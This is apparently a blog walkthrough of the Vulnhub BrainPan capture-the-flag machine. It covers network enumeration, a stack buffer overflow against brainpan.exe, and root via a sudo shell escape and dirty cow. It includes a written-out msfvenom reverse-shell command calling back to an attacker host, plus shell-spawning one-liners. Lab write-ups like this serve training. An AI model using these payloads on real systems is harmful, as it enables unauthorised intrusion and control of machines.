BrainPan — Vulnhub Walkthrough
Really my brain got on pan, especially when it increases it’s level. This is part 1, it took 30hrs to do this from scratch at my noob stage of hacking. This was my first buffer overflow machine, and I am here to share my thought process.
ENUMERATION
netdiscover to get the IP. #netdiscover -r 10.0.2.0/24
Then go for a fullport nmap scan
So only two ports are open:
- 9999
- 10000
We got nothing in UDP port can.So I opened 10.0.2.14:10000 on browser and found that there was only an image hosted on server.
So let us do a quick nikto scan
Here we can see a directory disclosure, named /bin/. So in browser we traverse to 10.0.2.14:10000/bin/, and we find an exe file named brainpan. When I tested it, this was a 32-bit portable executable. It’s clear it’s gonna be buffer overflow.
So let’s start by downloading it. Shift this to your windows machine, this may be your base machine or other Vbox. I am using this on base machine, though it’s risky.
EXPLOITATION
Running brainpan.exe
Then I ran immunity debugger and attached this process to it
Then on cmd , type C:\WINDOWS\system32>netstat -anob . /////Take care -b option works only if you run cmd with admin priv, this option is used to show what binary is getting executed on that port
So our windows IP is 192.168.1.6 and port is 9999 for brainpan.exe to get connected. So on kali machine we will use netcat to connect to this. On the same time we see receiving connection on our brainpan.exe. Left side : kali , right side: brainpan.exe.
So we will first check if this is vulnerable or not, for this we will use generic_send_tcp from kali
On kali machine : #locate generic_send_tcp, find the path and change directory to it. Mine is /usr/bin/generic_send_tcp
Make a file stats.spk , you can name it anything.spk
We wrote s_string_variable(“0”); Because when we tried entering anything in password field when we were doing netcat, our brainpan.exe shown, s =[]. This means our buffer name is “s” . Now run the generic_send_tcp
We observer here that first it sent some 5000 bytes of data , then gradually become less and finally died. This shows this param is vulnerable to overflow attack. Now we will do some fuzzing. For this write a script fuzzing.py
And again start brainpan.exe. Then run the script
Something happens and finally you will see
This is what we needed, i.e. at 900 bytes it crashed our brainpan.exe. So, we will make a payload using metasploit-framework.
Copy this payload to our next python script — — Offset.py
We run this and found changes in immunity debugger. We see we have overwritten all the registers.
Now new EIP is 35724134. Let’s create another payload to check actual buffer size. root@kali:/usr/bin# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 900 -q 35724134
So now we will overwrite our EIP, with some different value -overwriteEIP.py
On running this, we see on immunity debugger that we have successfully over written EIP register with B’s and other registers with A’s
Now is the time to check for bad characters which we don’t want to come in play , while creating payload. So we use a script for bad char testing, by passing all chars and see which one is treated in different meaning
Now running this will give us, same output as previous step. But what changes have taken place will be reflected in hex dump of ESP stack. So we will follow ESP in hex dump and compare characters
So we will finally make our payload. To do this first we will find vulnerable least security modules using moana. I did the usual step !moana , but it threw an error Pycommands: error importing module. So I checked the following points.
1) Immunity Debugger
2) Python 2.7.1 (32 bit)
3) And download mona from github : https://github.com/corelan/mona. And add mona.py to : C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands. Re run immunity debugger and run !mona from it to see if mona works, and it does.
Now load mona modules similarly as above: !mona modules
On running : !mona find -s “\xff\xe4” -m brainpan.exe
Time to write payload. For this first set the break point at jump instruction
Running the script to find if it hits the jump code at breakpoint.
Then on running this you see
A break point is set up at EIP, same address. Thus we control break point now we can add payload. To make payload we will use msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.6 LPORT=1234 EXITFUNC=thread -f c -a x86 -b “\x00”
And run the script. Changes we see here
- Padding added “\x90”*16 bytes
- IP address changed to our real target machine, instead of testing windows machine
Keeping your netcat listener on at port 1234. Run the script
Eureka we have got our shell !!!!!
PRIVILEGE ESCALATION
Ok so I enumerated Z: drive and it was whole like a linux drive , but how come seems to be windows? So I inspected , a program WINE was running.
Trial and Error
- I thought we either need to intrude some information from files in linux in Z: drive
- (or) I shifted to C: drive and tried windows escalation.
Nothing worked beccause:
- Files in linux held nothing.
- C: drive was just a drive which seemed to be of windows, it had not capability of windows commands except some basic cmd commands, but no sensitive files.
So what our developer of this machine want us to do? May be spawn from windows shell to linux shell !! Yes the trick lies here. When I did type checksrv.sh < a file already present in puck home directory> . This was the output
So from here I guessed we could run
1)/usr/bin/wine — — to execute any windows executable
2)/usr/bin/python — — to use python on machine
So an idea hit my mind, why not try sudo in same manner
Sudo -l : it showed file not found …. It was simple sudo is not a command of cmd, nor this is actual windows machine. And any linux command directly being run from here will be of no use, cause it not defined anywhere. So /usr/bin/sudo -l: listed above things.
We could use /usr/bin/sudo /home/anansi/bin/anansi_util , to do something provided by that anansi_util function. So we gave it a try:
This shows we need to provide some action in front of this command
I tried with network, which gave a useless output. But then with proclist, I found an arbitrary behavior. It went to an unknown terminal type. And if we press enter it escapes, but if we not. It allows us to type something. Why not escape it using python utility we found above
You can do priv esc easily after this, which I will show after this method.
Method1:
And see we have escaped windows nonsense, and are free to use as many linux commands as we need. But we see we lose our linux shell arbitrarily. This means there is something running behind, that prevents full access to linux terminal. So I press enter and when I get chance to run command on puck@brainpan, I did enumerate process
You see there is pluplay.exe running, let’s run it again. And you will see you escaped windows shell. So I started with basic linux enumeration
- Changing home directories of users : denied
- Uname -a : linux kernel info
So I found it is vulnerable to dirty cow exploit. So I compiled it using -m32 for x86 arch. And then run it on target machine.
So the exploit worked. Let’s log in
Eureka !! We have successfully rooted the machine.
Method 2:
In this, if you used Manual (3rd method listed) in sudo -l , instead of proclist. And instead of /usr/bin/python -c “import pty; pty.spawn(‘/bin/bash’);”
Type : !/bin/sh. You would be the root.
